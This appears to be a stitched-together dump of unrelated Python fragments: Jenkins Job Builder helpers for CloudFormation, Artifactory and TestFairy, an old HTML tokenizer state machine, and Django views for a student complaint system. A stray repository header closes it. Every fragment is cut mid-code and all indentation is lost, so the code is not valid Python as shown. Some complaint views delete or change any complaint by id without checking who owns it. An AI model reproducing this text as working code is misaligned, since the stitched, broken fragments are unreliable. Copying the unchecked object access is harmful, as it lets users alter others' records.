if select == 'permalink':
mapping.append(('', 'id', permalinkdict[permalink]))
if select == 'build-param':
mapping.append(('param', 'parameterName', ''))
if select == 'downstream-build':
mapping.append(
('upstream-project-name', 'upstreamProjectName', ''))
mapping.append(
('upstream-build-number', 'upstreamBuildNumber', ''))
convert_mapping_to_xml(selector, data, mapping, fail_required=False)
def findbugs_settings(xml_parent, data):
# General Options
mapping = [
('rank-priority', 'isRankActivated', False),
('include-files', 'includePattern', ''),
('exclude-files', 'excludePattern', ''),
]
convert_mapping_to_xml(xml_parent, data, mapping, fail_required=True)
def get_value_from_yaml_or_config_file(key, section, data, jjb_config):
return jjb_config.get_plugin_config(section, key, data.get(key, ''))
def cloudformation_region_dict():
region_dict = {'us-east-1': 'US_East_Northern_Virginia',
'us-west-1': 'US_WEST_Northern_California',
'us-west-2': 'US_WEST_Oregon',
'eu-central-1': 'EU_Frankfurt',
'eu-west-1': 'EU_Ireland',
'ap-southeast-1': 'Asia_Pacific_Singapore',
'ap-southeast-2': 'Asia_Pacific_Sydney',
'ap-northeast-1': 'Asia_Pacific_Tokyo',
'sa-east-1': 'South_America_Sao_Paulo'}
return region_dict
def cloudformation_init(xml_parent, data, xml_tag):
cloudformation = XML.SubElement(
xml_parent, 'com.syncapse.jenkinsci.'
'plugins.awscloudformationwrapper.' + xml_tag)
return XML.SubElement(cloudformation, 'stacks')
def cloudformation_stack(xml_parent, stack, xml_tag, stacks, region_dict):
if 'name' not in stack or stack['name'] == '':
raise MissingAttributeError('name')
step = XML.SubElement(
stacks, 'com.syncapse.jenkinsci.plugins.'
'awscloudformationwrapper.' + xml_tag)
if xml_tag == 'SimpleStackBean':
mapping = [('prefix', 'isPrefixSelected', False)]
else:
parameters_value = ','.join(stack.get('parameters', []))
mapping = [
('description', 'description', ''),
('', 'parameters', parameters_value),
('timeout', 'timeout', '0'),
('sleep', 'sleep', '0'),
('recipe', 'cloudFormationRecipe', None)]
cloudformation_stack_mapping = [
('name', 'stackName', None),
('access-key', 'awsAccessKey', None),
('secret-key', 'awsSecretKey', None),
('region', 'awsRegion', None, region_dict)]
for map in mapping:
cloudformation_stack_mapping.append(map)
convert_mapping_to_xml(step, stack,
cloudformation_stack_mapping, fail_required=True)
def include_exclude_patterns(xml_parent, data, yaml_prefix,
xml_elem_name):
xml_element = XML.SubElement(xml_parent, xml_elem_name)
XML.SubElement(xml_element, 'includePatterns').text = ','.join(
data.get(yaml_prefix + '-include-patterns', []))
XML.SubElement(xml_element, 'excludePatterns').text = ','.join(
data.get(yaml_prefix + '-exclude-patterns', []))
def artifactory_deployment_patterns(xml_parent, data):
include_exclude_patterns(xml_parent, data, 'deployment',
'artifactDeploymentPatterns')
def artifactory_env_vars_patterns(xml_parent, data):
include_exclude_patterns(xml_parent, data, 'env-vars',
'envVarsPatterns')
def artifactory_optional_props(xml_parent, data, target):
optional_str_props = [
('scopes', 'scopes'),
('violationRecipients', 'violation-recipients'),
('blackDuckAppName', 'black-duck-app-name'),
('blackDuckAppVersion', 'black-duck-app-version'),
('blackDuckReportRecipients', 'black-duck-report-recipients'),
('blackDuckScopes', 'black-duck-scopes')
]
for (xml_prop, yaml_prop) in optional_str_props:
XML.SubElement(xml_parent, xml_prop).text = data.get(
yaml_prop, '')
common_bool_props = [
# yaml property name, xml property name, default value
('deploy-artifacts', 'deployArtifacts', True),
('discard-old-builds', 'discardOldBuilds', False),
('discard-build-artifacts', 'discardBuildArtifacts', False),
('publish-build-info', 'deployBuildInfo', False),
('env-vars-include', 'includeEnvVars', False),
('run-checks', 'runChecks', False),
('include-publish-artifacts', 'includePublishArtifacts', False),
('license-auto-discovery', 'licenseAutoDiscovery', True),
('enable-issue-tracker-integration', 'enableIssueTrackerIntegration',
False),
('aggregate-build-issues', 'aggregateBuildIssues', False),
('black-duck-run-checks', 'blackDuckRunChecks', False),
('black-duck-include-published-artifacts',
'blackDuckIncludePublishedArtifacts', False),
('auto-create-missing-component-requests',
'autoCreateMissingComponentRequests', True),
('auto-discard-stale-component-requests',
'autoDiscardStaleComponentRequests', True),
('filter-excluded-artifacts-from-build',
'filterExcludedArtifactsFromBuild', False)
]
convert_mapping_to_xml(
xml_parent, data, common_bool_props, fail_required=True)
if 'wrappers' in target:
wrapper_bool_props = [
('enable-resolve-artifacts', 'enableResolveArtifacts', False),
('disable-license-auto-discovery',
'disableLicenseAutoDiscovery', False),
('record-all-dependencies',
'recordAllDependencies', False)
]
convert_mapping_to_xml(
xml_parent, data, wrapper_bool_props, fail_required=True)
if 'publishers' in target:
publisher_bool_props = [
('even-if-unstable', 'evenIfUnstable', False),
('pass-identified-downstream', 'passIdentifiedDownstream', False),
('allow-promotion-of-non-staged-builds',
'allowPromotionOfNonStagedBuilds', False)
]
convert_mapping_to_xml(
xml_parent, data, publisher_bool_props, fail_required=True)
def artifactory_common_details(details, data):
mapping = [
('name', 'artifactoryName', ''),
('url', 'artifactoryUrl', ''),
]
convert_mapping_to_xml(details, data, mapping, fail_required=True)
def artifactory_repository(xml_parent, data, target):
if 'release' in target:
release_mapping = [
('deploy-release-repo-key', 'keyFromText', ''),
('deploy-release-repo-key', 'keyFromSelect', ''),
('deploy-dynamic-mode', 'dynamicMode', False),
]
convert_mapping_to_xml(
xml_parent, data, release_mapping, fail_required=True)
if 'snapshot' in target:
snapshot_mapping = [
('deploy-snapshot-repo-key', 'keyFromText', ''),
('deploy-snapshot-repo-key', 'keyFromSelect', ''),
('deploy-dynamic-mode', 'dynamicMode', False),
]
convert_mapping_to_xml(
xml_parent, data, snapshot_mapping, fail_required=True)
def append_git_revision_config(parent, config_def):
params = XML.SubElement(
parent, 'hudson.plugins.git.GitRevisionBuildParameters')
try:
# If git-revision is a boolean, the get() will
# throw an AttributeError
combine_commits = str(
config_def.get('combine-queued-commits', False)).lower()
except AttributeError:
combine_commits = 'false'
XML.SubElement(params, 'combineQueuedCommits').text = combine_commits
def test_fairy_common(xml_element, data):
xml_element.set('plugin', 'TestFairy')
valid_max_duration = ['10m', '60m', '300m', '1440m']
valid_interval = [1, 2, 5]
valid_video_quality = ['high', 'medium', 'low']
mappings = [
# General
('apikey', 'apiKey', None),
('appfile', 'appFile', None),
('tester-groups', 'testersGroups', ''),
('notify-testers', 'notifyTesters', True),
('autoupdate', 'autoUpdate', True),
# Session
('max-duration', 'maxDuration', '10m', valid_max_duration),
('record-on-background', 'recordOnBackground', False),
('data-only-wifi', 'dataOnlyWifi', False),
# Video
('video-enabled', 'isVideoEnabled', True),
('screenshot-interval', 'screenshotInterval', 1, valid_interval),
('video-quality', 'videoQuality', 'high', valid_video_quality),
# Metrics
('cpu', 'cpu', True),
('memory', 'memory', True),
('logs', 'logs', True),
('network', 'network', False),
('phone-signal', 'phoneSignal', False),
('wifi', 'wifi', False),
('gps', 'gps', False),
('battery', 'battery', False),
('opengl', 'openGl', False),
# Advanced options
('advanced-options', 'advancedOptions', '')
]
convert_mapping_to_xml(xml_element, data, mappings, fail_required=True)
def trigger_get_parameter_order(registry, plugin):
logger = logging.getLogger("%s:trigger_get_parameter_order" % __name__)
if str(registry.jjb_config.get_plugin_config(
plugin, 'param_order_from_yaml', True)).lower() == 'false':
logger.warning(
"Using deprecated order for parameter sets in %s. It is "
"recommended that you update your job definition instead of "
"enabling use of the old hardcoded order", plugin)
# deprecated order
return [
'predefined-parameters',
'git-revision',
'property-file',
'current-parameters',
'node-parameters',
'svn-revision',
'restrict-matrix-project',
'node-label-name',
'node-label',
'boolean-parameters',
]
return None
def trigger_project(tconfigs, project_def, param_order=None):
logger = logging.getLogger("%s:trigger_project" % __name__)
pt_prefix = 'hudson.plugins.parameterizedtrigger.'
if param_order:
parameters = param_order
else:
parameters = project_def.keys()
for param_type in parameters:
param_value = project_def.get(param_type)
if param_value is None:
continue
if param_type == 'predefined-parameters':
params = XML.SubElement(tconfigs, pt_prefix +
'PredefinedBuildParameters')
| |
= self.lastFourChars[-4:]
return True
def entityDataState(self):
entity = self.consumeEntity()
if entity:
self.tokenQueue.append({"type": "Characters", "data": entity})
else:
self.tokenQueue.append({"type": "Characters", "data": u"&"})
self.state = self.states["data"]
return True
def tagOpenState(self):
data = self.stream.char()
if self.contentModelFlag == contentModelFlags["PCDATA"]:
if data == u"!":
self.state = self.states["markupDeclarationOpen"]
elif data == u"/":
self.state = self.states["closeTagOpen"]
elif data in asciiLetters:
self.currentToken =\
{"type": "StartTag", "name": data, "data": []}
self.state = self.states["tagName"]
elif data == u">":
# XXX In theory it could be something besides a tag name. But
# do we really care?
self.tokenQueue.append({"type": "ParseError", "data":
"expected-tag-name-but-got-right-bracket"})
self.tokenQueue.append({"type": "Characters", "data": u"<>"})
self.state = self.states["data"]
elif data == u"?":
# XXX In theory it could be something besides a tag name. But
# do we really care?
self.tokenQueue.append({"type": "ParseError", "data":
"expected-tag-name-but-got-question-mark"})
self.stream.unget(data)
self.state = self.states["bogusComment"]
else:
# XXX
self.tokenQueue.append({"type": "ParseError", "data":
"expected-tag-name"})
self.tokenQueue.append({"type": "Characters", "data": u"<"})
self.stream.unget(data)
self.state = self.states["data"]
else:
# We know the content model flag is set to either RCDATA or CDATA
# now because this state can never be entered with the PLAINTEXT
# flag.
if data == u"/":
self.state = self.states["closeTagOpen"]
else:
self.tokenQueue.append({"type": "Characters", "data": u"<"})
self.stream.unget(data)
self.state = self.states["data"]
return True
def closeTagOpenState(self):
if (self.contentModelFlag in (contentModelFlags["RCDATA"],
contentModelFlags["CDATA"])):
if self.currentToken:
charStack = []
# So far we know that "</" has been consumed. We now need to know
# whether the next few characters match the name of last emitted
# start tag which also happens to be the currentToken. We also need
# to have the character directly after the characters that could
# match the start tag name.
for x in xrange(len(self.currentToken["name"]) + 1):
charStack.append(self.stream.char())
# Make sure we don't get hit by EOF
if charStack[-1] == EOF:
break
# Since this is just for checking. We put the characters back on
# the stack.
self.stream.unget(charStack)
if self.currentToken \
and self.currentToken["name"].lower() == "".join(charStack[:-1]).lower() \
and charStack[-1] in (spaceCharacters |
frozenset((u">", u"/", u"<", EOF))):
# Because the characters are correct we can safely switch to
# PCDATA mode now. This also means we don't have to do it when
# emitting the end tag token.
self.contentModelFlag = contentModelFlags["PCDATA"]
else:
self.tokenQueue.append({"type": "Characters", "data": u"</"})
self.state = self.states["data"]
# Need to return here since we don't want the rest of the
# method to be walked through.
return True
data = self.stream.char()
if data in asciiLetters:
self.currentToken = {"type":"EndTag", "name":data, "data":[]}
self.state = self.states["tagName"]
elif data == u">":
self.tokenQueue.append({"type": "ParseError", "data":
"expected-closing-tag-but-got-right-bracket"})
self.state = self.states["data"]
elif data == EOF:
self.tokenQueue.append({"type": "ParseError", "data":
"expected-closing-tag-but-got-eof"})
self.tokenQueue.append({"type": "Characters", "data": u"</"})
self.state = self.states["data"]
else:
# XXX data can be _'_...
self.tokenQueue.append({"type": "ParseError", "data":
"expected-closing-tag-but-got-char",
"datavars": {"data": data}})
self.stream.unget(data)
self.state = self.states["bogusComment"]
return True
def tagNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.states["beforeAttributeName"]
elif data in asciiLetters:
self.currentToken["name"] += data +\
self.stream.charsUntil(asciiLetters, True)
elif data == u">":
self.emitCurrentToken()
elif data == EOF:
self.tokenQueue.append({"type": "ParseError", "data":
"eof-in-tag-name"})
self.emitCurrentToken()
elif data == u"/":
self.processSolidusInTag()
self.state = self.states["beforeAttributeName"]
else:
self.currentToken["name"] += data
return True
def beforeAttributeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.stream.charsUntil(spaceCharacters, True)
elif data in asciiLetters:
self.currentToken["data"].append([data, ""])
self.state = self.states["attributeName"]
elif data == u">":
self.emitCurrentToken()
elif data == u"/":
self.processSolidusInTag()
elif data == u"'" or data == u'"' or data == u"=":
self.tokenQueue.append({"type": "ParseError", "data":
"invalid-character-in-attribute-name"})
self.currentToken["data"].append([data, ""])
self.state = self.states["attributeName"]
elif data == EOF:
self.tokenQueue.append({"type": "ParseError", "data":
"expected-attribute-name-but-got-eof"})
self.emitCurrentToken()
else:
self.currentToken["data"].append([data, ""])
self.state = self.states["attributeName"]
return True
def attributeNameState(self):
data = self.stream.char()
leavingThisState = True
emitToken = False
if data == u"=":
self.state = self.states["beforeAttributeValue"]
elif data in asciiLetters:
self.currentToken["data"][-1][0] += data +\
self.stream.charsUntil(asciiLetters, True)
leavingThisState = False
elif data == u">":
# XXX If we emit here the attributes are converted to a dict
# without being checked and when the code below runs we error
# because data is a dict not a list
emitToken = True
elif data in spaceCharacters:
self.state = self.states["afterAttributeName"]
elif data == u"/":
if not self.processSolidusInTag():
self.state = self.states["beforeAttributeName"]
elif data == u"'" or data == u'"':
self.tokenQueue.append({"type": "ParseError", "data":
"invalid-character-in-attribute-name"})
self.currentToken["data"][-1][0] += data
leavingThisState = False
elif data == EOF:
self.tokenQueue.append({"type": "ParseError", "data":
"eof-in-attribute-name"})
self.state = self.states["data"]
emitToken = True
else:
self.currentToken["data"][-1][0] += data
leavingThisState = False
if leavingThisState:
# Attributes are not dropped at this stage. That happens when the
# start tag token is emitted so values can still be safely appended
# to attributes, but we do want to report the parse error in time.
if self.lowercaseAttrName:
self.currentToken["data"][-1][0] = (
self.currentToken["data"][-1][0].translate(asciiUpper2Lower))
for name, value in self.currentToken["data"][:-1]:
if self.currentToken["data"][-1][0] == name:
self.tokenQueue.append({"type": "ParseError", "data":
"duplicate-attribute"})
break
# XXX Fix for above XXX
if emitToken:
self.emitCurrentToken()
return True
def afterAttributeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.stream.charsUntil(spaceCharacters, True)
elif data == u"=":
self.state = self.states["beforeAttributeValue"]
elif data == u">":
self.emitCurrentToken()
elif data in asciiLetters:
self.currentToken["data"].append([data, ""])
self.state = self.states["attributeName"]
elif data == u"/":
if not self.processSolidusInTag():
self.state = self.states["beforeAttributeName"]
elif data == EOF:
self.tokenQueue.append({"type": "ParseError", "data":
"expected-end-of-tag-but-got-eof"})
self.emitCurrentToken()
else:
self.currentToken["data"].append([data, ""])
self.state = self.states["attributeName"]
return True
def beforeAttributeValueState(self):
data = self.stream.char()
if data in spaceCharacters:
self.stream.charsUntil(spaceCharacters, True)
elif data == u"\"":
self.state = self.states["attributeValueDoubleQuoted"]
elif data == u"&":
self.state = self.states["attributeValueUnQuoted"]
self.stream.unget(data);
elif data == u"'":
self.state = self.states["attributeValueSingleQuoted"]
elif data == u">":
self.emitCurrentToken()
elif data == u"=":
self.tokenQueue.append({"type": "ParseError", "data":
"equals-in-unquoted-attribute-value"})
self.currentToken["data"][-1][1] += data
self.state = self.states["attributeValueUnQuoted"]
elif data == EOF:
self.tokenQueue.append({"type": "ParseError", "data":
"expected-attribute-value-but-got-eof"})
self.emitCurrentToken()
else:
self.currentToken["data"][-1][1] += data
self.state = self.states["attributeValueUnQuoted"]
return True
def attributeValueDoubleQuotedState(self):
data = self.stream.char()
if data == "\"":
self.state = self.states["afterAttributeValue"]
elif data == u"&":
self.processEntityInAttribute(u'"')
elif data == EOF:
self.tokenQueue.append({"type": "ParseError", "data":
"eof-in-attribute-value-double-quote"})
self.emitCurrentToken()
else:
self.currentToken["data"][-1][1] += data +\
self.stream.charsUntil(("\"", u"&"))
return True
def attributeValueSingleQuotedState(self):
data = self.stream.char()
if data == "'":
self.state = self.states["afterAttributeValue"]
elif data == u"&":
self.processEntityInAttribute(u"'")
elif data == EOF:
self.tokenQueue.append({"type": "ParseError", "data":
"eof-in-attribute-value-single-quote"})
self.emitCurrentToken()
else:
self.currentToken["data"][-1][1] += data +\
self.stream.charsUntil(("'", u"&"))
return True
def attributeValueUnQuotedState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.states["beforeAttributeName"]
elif data == u"&":
self.processEntityInAttribute(None)
elif data == u">":
self.emitCurrentToken()
elif data == u'"' or data == u"'" or data == u"=":
self.tokenQueue.append({"type": "ParseError", "data":
"unexpected-character-in-unquoted-attribute-value"})
self.currentToken["data"][-1][1] += data
elif data == EOF:
self.tokenQueue.append({"type": "ParseError", "data":
"eof-in-attribute-value-no-quotes"})
self.emitCurrentToken()
else:
self.currentToken["data"][-1][1] += data + self.stream.charsUntil( \
frozenset(("&", ">", "<", "=", "'", '"')) | spaceCharacters)
return True
def afterAttributeValueState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.states["beforeAttributeName"]
elif data == u">":
self.emitCurrentToken()
self.state = self.states["data"]
elif data == u"/":
if not self.processSolidusInTag():
self.state = self.states["beforeAttributeName"]
elif data == EOF:
self.tokenQueue.append({"type": "ParseError", "data":
"unexpected-EOF-after-attribute-value"})
self.emitCurrentToken()
self.stream.unget(data)
self.state = self.states["data"]
else:
self.tokenQueue.append({"type": "ParseError", "data":
"unexpected-character-after-attribute-value"})
self.stream.unget(data)
self.state = self.states["beforeAttributeName"]
return True
def bogusCommentState(self):
# Make a new comment token and give it as value all the characters
# until the first > or EOF (charsUntil checks for EOF automatically)
# and emit it.
self.tokenQueue.append(
{"type": "Comment", "data": self.stream.charsUntil((u">"))})
# Eat the character directly after the bogus comment which is either a
# ">" or an EOF.
self.stream.char()
self.state = self.states["data"]
return True
def markupDeclarationOpenState(self):
charStack = [self.stream.char(), self.stream.char()]
if charStack == [u"-", u"-"]:
self.currentToken = {"type": "Comment", "data": u""}
self.state = self.states["commentStart"]
else:
for x in xrange(5):
charStack.append(self.stream.char())
# Put in explicit EOF check
if (not EOF in charStack and
"".join(charStack).upper() == u"DOCTYPE"):
self.currentToken = {"type":"Doctype", "name":u"",
"publicId":None, "systemId":None, "correct":True}
self.state = self.states["doctype"]
else:
self.tokenQueue.append({"type": "ParseError", "data":
"expected-dashes-or-doctype"})
self.stream.unget(charStack)
self.state = self.states["bogusComment"]
return True
def commentStartState(self):
data = self.stream.char()
if data == "-":
self.state = self.states["commentStartDash"]
elif data == ">":
self.tokenQueue.append({"type": "ParseError", "data":
"incorrect-comment"})
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
elif data == EOF:
self.tokenQueue.append({"type": "ParseError", "data":
"eof-in-comment"})
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
else:
self.currentToken["data"] += data + self.stream.charsUntil(u"-")
self.state = self.states["comment"]
return True
def commentStartDashState(self):
data = self.stream.char()
if data == "-":
self.state = self.states["commentEnd"]
elif data == ">":
self.tokenQueue.append({"type": "ParseError", "data":
"incorrect-comment"})
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
elif data == EOF:
self.tokenQueue.append({"type": "ParseError", "data":
"eof-in-comment"})
self.tokenQueue.append(self.currentToken)
self.state | |
comp_id = request.POST.get('comp_id', '')
comp_type = request.POST.get('complaint_type', '')
location = request.POST.get('Location', '')
specific_location = request.POST.get('specific_location', '')
comp_file = request.FILES.get('myfile')
print("Attachment : ",comp_file)
details = request.POST.get('details', '')
complaint_finish = datetime.now() + timedelta(days=2)
if comp_type == 'Electricity':
complaint_finish = datetime.now() + timedelta(days=2)
elif comp_type == 'carpenter':
complaint_finish = datetime.now() + timedelta(days=2)
elif comp_type == 'plumber':
complaint_finish = datetime.now() + timedelta(days=2)
elif comp_type == 'garbage':
complaint_finish = datetime.now() + timedelta(days=1)
elif comp_type == 'dustbin':
complaint_finish = datetime.now() + timedelta(days=1)
elif comp_type == 'internet':
complaint_finish = datetime.now() + timedelta(days=4)
elif comp_type == 'other':
complaint_finish = datetime.now() + timedelta(days=3)
y = ExtraInfo.objects.get(id=comp_id)
x = StudentComplain(complainer=y,
complaint_type=comp_type,
location=location,
specific_location=specific_location,
details=details,
complaint_finish=complaint_finish,
upload_complaint =comp_file)
print('lets check')
x.save()
# messages.info(request,'Complaint successfully launched.')
# return HttpResponseRedirect('/complaint/user/')
return HttpResponseRedirect('/complaint/user/')
@login_required
def caretaker(request):
"""
The function is used to display details to the caretaker such as registered complaints and allows to assign workers
@param:
request - trivial.
@variables:
issue - The issue object.
supported - True if the user's intention is to support the issue.
support_count - Total supporters of the above issue.
context - Holds data needed to make necessary changes in the template.
"""
current_user = get_object_or_404(User, username=request.user.username)
y = ExtraInfo.objects.all().filter(user=current_user).first()
if request.method == 'POST':
type = request.POST.get('submit', '')
worker_type = request.POST.get('complaint_type', '')
name = request.POST.get('name', '')
phone = request.POST.get('phone_no', '')
age = request.POST.get('age', '')
try:
y = ExtraInfo.objects.get(id=y.id)
a = Caretaker.objects.get(staff_id=y)
except Exception as e:
print(e)
a = None
y = None
intage = int(age)
intphone = int(phone)
if len(phone) == 10 and intage > 20 and intage < 50 and intphone > 1999999999:
x = Workers(caretaker_id=a,
name=name,
age=age,
phone=phone,
worker_type=worker_type)
if not Workers.objects.filter(caretaker_id=a,name=name, age=age,phone=phone,worker_type=worker_type).exists():
x.save()
b = a.area
historytemp = StudentComplain.objects.filter(location=b).order_by('-id')
history = []
j = 1
k = 1
for i in historytemp:
if j%2 == 1:
history.append(i)
j = j+1
for h in history:
h.serial_no = k
k=k+1
total_worker = []
total_workertemp = Workers.objects.filter(caretaker_id=a)
j = 1
for i in total_workertemp:
if j%2 != 0:
total_worker.append(i)
j = j + 1
complaint_assign_no = []
for x in total_worker:
worker = Workers.objects.get(id=x.id)
temp = StudentComplain.objects.filter(worker_id=worker).count()
worker.total_complaint = temp
complaint_assign_no.append(worker)
return render(request, "complaintModule/complaint_caretaker.html",
{'history': history, 'comp_id': y.id, 'total_worker':
total_worker, 'complaint_assign_no': complaint_assign_no})
else:
y = ExtraInfo.objects.get(id=y.id)
a = Caretaker.objects.get(staff_id=y)
b = a.area
history = []
historytemp = StudentComplain.objects.filter(location=b).order_by('-id')
total_worker = []
total_workertemp = Workers.objects.filter(caretaker_id=a)
j = 1
for i in total_workertemp:
if j%2 != 0:
total_worker.append(i)
j = j + 1
complaint_assign_no = []
complaint_assign_no = []
for x in total_worker:
worker = Workers.objects.get(id=x.id)
temp = StudentComplain.objects.filter(worker_id=worker).count()
worker.total_complaint = temp
complaint_assign_no.append(worker)
overduecomplaint = []
j = 1
k = 1
for i in historytemp:
if j%2 != 0:
history.append(i)
j=j+1
for i in history:
i.serial_no = k
k = k + 1
if i.status != 2 and i.status !=3:
if i.complaint_finish < date.today():
i.delay = date.today() - i.complaint_finish
overduecomplaint.append(i)
return render(request, "complaintModule/complaint_caretaker.html",
{ 'history': history, 'comp_id': y.id, 'total_worker': total_worker,
'complaint_assign_no': complaint_assign_no,
'overduecomplaint': overduecomplaint, 'care_id': a})
@login_required
def changestatus(request, complaint_id, status):
"""
The function is used by caretaker to change the status of a complaint.
@param:
request - trivial.
complaint_id - used to get complaint_id registered.
status-used to get the current status of complaints
@variables:
issue - The issue object.
supported - True if the user's intention is to support the issue.
support_count - Total supporters of the above issue.
context - Holds data needed to make necessary changes in the template.
"""
if status == '3':
StudentComplain.objects.filter(id=complaint_id).\
update(status=status, worker_id='')
return HttpResponseRedirect('/complaint/caretaker/')
elif status == '2':
StudentComplain.objects.filter(id=complaint_id).\
update(status=status, worker_id='')
return HttpResponseRedirect('/complaint/caretaker/')
else:
StudentComplain.objects.filter(id=complaint_id).\
update(status=status)
return HttpResponseRedirect('/complaint/caretaker/')
@login_required
def removew(request, work_id):
"""
The function is used by caretaker to remove workers.
@param:
request - trivial.
work_id - id of the issue object which the user intends to support/unsupport.
@variables:
issue - The issue object.
supported - True if the user's intention is to support the issue.
support_count - Total supporters of the above issue.
context - Holds data needed to make necessary changes in the template.
"""
worker = Workers.objects.get(id=work_id)
temp = StudentComplain.objects.filter(worker_id=worker).count()
if temp == 0:
worker.delete()
return HttpResponseRedirect('/complaint/caretaker/')
else:
return HttpResponse('<H1> Worker is assign some complaint</h1>')
@login_required
def submitfeedback(request, complaint_id):
"""
The function is used by the complainant to enter feedback after the complaint has been resolved
@param:
request - trivial.
complaint_id - id of the registerd complaint.
@variables:
issue - The issue object.
supported - True if the user's intention is to support the issue.
support_count - Total supporters of the above issue.
context - Holds data needed to make necessary changes in the template.
"""
if request.method == 'POST':
feedback = request.POST.get('feedback', '')
rating = request.POST.get('rating', '')
StudentComplain.objects.filter(id=complaint_id).\
update(feedback=feedback, flag=rating)
a = StudentComplain.objects.filter(id=complaint_id).first()
care = Caretaker.objects.filter(area=a.location).first()
rate = care.rating
newrate = 0
if rate == 0:
newrate = rating
else:
a1 = int(rating)
b1 = int(rate)
c1 = int((a1+b1)/2)
newrate = c1
Caretaker.objects.select_related().filter(area=a.location).update(rating=newrate)
return HttpResponseRedirect('/complaint/user/')
return render(request,"complaintModule/feedback.html",{'a' : a})
else:
a = StudentComplain.objects.get(id=complaint_id)
return render(request, "complaintModule/submit_feedback.html", {'a': a})
@login_required
def deletecomplaint(request, comp_id1):
"""
function to delete complaint
"""
StudentComplain.objects.get(id=comp_id1).delete()
return HttpResponseRedirect('/complaint/caretaker/')
@login_required
def supervisor(request):
"""
The function is used to display all registered complaints to the supervisor
@param:
request - trivial.
@variables:
issue - The issue object.
supported - True if the user's intention is to support the issue.
support_count - Total supporters of the above issue.
context - Holds data needed to make necessary changes in the template.
"""
current_user = get_object_or_404(User, username=request.user.username)
y = ExtraInfo.objects.all().filter(user=current_user).first()
if request.method == 'POST' :
try:
y = ExtraInfo.objects.get(id=y.id)
a = Supervisor.objects.get(sup_id=y)
except Exception as e:
print(e)
a = None
y = None
all_caretaker = Caretaker.objects.filter(area=a.area).order_by('-id')
area = all_caretaker[0].area
# ExtraInfo.objects.get(id=sup_id)
all_complaint = []
numtemp = StudentComplain.objects.filter(location = area).filter(status = 0).count()
num = int(numtemp/2+0.5)
all_complainttemp = StudentComplain.objects.filter(location=a.area).order_by('-id')
j = 1
for i in all_complainttemp:
if j%2 != 0:
all_complaint.append(i)
j = j + 1
overduecomplaint = []
for i in all_complaint:
if i.status != 2 and i.status != 3:
if i.complaint_finish < date.today():
i.delay = date.today() - i.complaint_finish
overduecomplaint.append(i)
return render(request, "complaintModule/supervisor1.html",
{'all_caretaker': all_caretaker, 'all_complaint': all_complaint,
'overduecomplaint': overduecomplaint, 'area': area,'num':num})
else:
y = ExtraInfo.objects.get(id=y.id)
a = Supervisor.objects.get(sup_id=y)
all_caretaker = Caretaker.objects.filter(area=a.area).order_by('-id')
area = all_caretaker[0].area
numtemp = StudentComplain.objects.filter(location = area).filter(status = 0).count()
num = int(numtemp/2+0.5)
all_complaint = []
all_complainttemp = StudentComplain.objects.filter(location=a.area).order_by('-id')
j = 1
for i in all_complainttemp:
if j%2 != 0:
all_complaint.append(i)
j = j + 1
overduecomplaint = []
for i in all_complaint:
if i.status != 2 and i.status != 3:
if i.complaint_finish < date.today():
i.delay = date.today() - i.complaint_finish
overduecomplaint.append(i)
return render(request, "complaintModule/supervisor1.html",
{'all_caretaker': all_caretaker, 'all_complaint': all_complaint,
'overduecomplaint': overduecomplaint, 'area': area, 'num' : num})
@login_required
def caretaker_id_know_more(request,caretaker_id):
this_caretaker = Caretaker.objects.get(id = caretaker_id)
this_caretaker_area = this_caretaker.area;
list_pending_complaints = []
list_pending_complaintstemp = StudentComplain.objects.filter(location = this_caretaker_area).filter(status = 0)
j = 1
for i in list_pending_complaintstemp:
if j%2 != 0:
list_pending_complaints.append(i)
j = j + 1
# num = StudentComplain.objects.filter(location = this_caretaker_area).filter(status = 0).count();
num = len(list_pending_complaints)
return render(request, "complaintModule/caretaker_id_know_more.html",{'this_caretaker':this_caretaker , 'list_pending_complaints':list_pending_complaints, 'num':num})
def search_complaint(request):
return HttpResponseRedirect('/login/')
@login_required
def resolvepending(request, cid):
a = get_object_or_404(User, username=request.user.username)
y = ExtraInfo.objects.all().filter(user=a).first()
thiscomplaint = StudentComplain.objects.get(id=cid)
if request.method == 'POST':
newstatus = request.POST.get('yesorno','')
intstatus = 0
if newstatus == 'Yes':
intstatus = 2
else:
intstatus = 3
StudentComplain.objects.filter(id=cid).\
update(status=intstatus)
complainer_details = StudentComplain.objects.get(id=cid)
complaint_system_notif(request.user, complainer_details.complainer.user ,'comp_resolved_alert')
return HttpResponseRedirect("/complaint/caretaker/")
else:
# complainer_details = StudentComplain.objects.get(id=cid)
# complaint_system_notif(request.user, complainer_details.complainer.user ,'comp_resolved_alert')
return render(request,"complaintModule/resolve_pending.html",{"a" : a,"thiscomplaint" : thiscomplaint})
def login1(request):
if request.method == 'POST':
u = request.POST.get('username', '')
p = request.POST.get('password', '')
user = authenticate(username=u, password=p)
if user is not None:
if user.is_active:
login(request, user)
a = User.objects.get(username=u)
b = ExtraInfo.objects.get(user=a)
return HttpResponseRedirect('/complaint/')
else:
return HttpResponse("<h1>wrong user credentials</h1>")
else:
return HttpResponseRedirect('/login/')
@login_required
def feedback_super(request, feedcomp_id):
detail3 = StudentComplain.objects.get(id=feedcomp_id)
a=User.objects.get(username=detail3.complainer.user.username)
y=ExtraInfo.objects.get(user=a)
temp=StudentComplain.objects.filter(complainer=y).first()
comp_id=temp.id
loc = detail3.location
care = Caretaker.objects.filter(area=loc).first()
return render(request, "complaintModule/feedback_super.html", {"detail3": detail3,"comp_id":comp_id,"care":care})
@login_required
def feedback_care(request, feedcomp_id):
detail2 = StudentComplain.objects.get(id=feedcomp_id)
a=User.objects.get(username=detail2.complainer.user.username)
y=ExtraInfo.objects.get(user=a)
temp=StudentComplain.objects.filter(complainer=y).first()
comp_id=temp.id
return render(request, "complaintModule/feedback_care.html", {"detail2": detail2,"comp_id":comp_id})
@login_required
def detail(request, detailcomp_id1):
"""
function that shows detail about complaint
"""
detail = StudentComplain.objects.get(id=detailcomp_id1)
a=User.objects.get(username=detail.complainer.user.username)
y=ExtraInfo.objects.get(user=a)
num=0
if detail.upload_complaint != "":
num = 1
temp=StudentComplain.objects.filter(complainer=y).first()
| |
<reponame>siiptuo/kriobot
# SPDX-FileCopyrightText: 2021 <NAME>
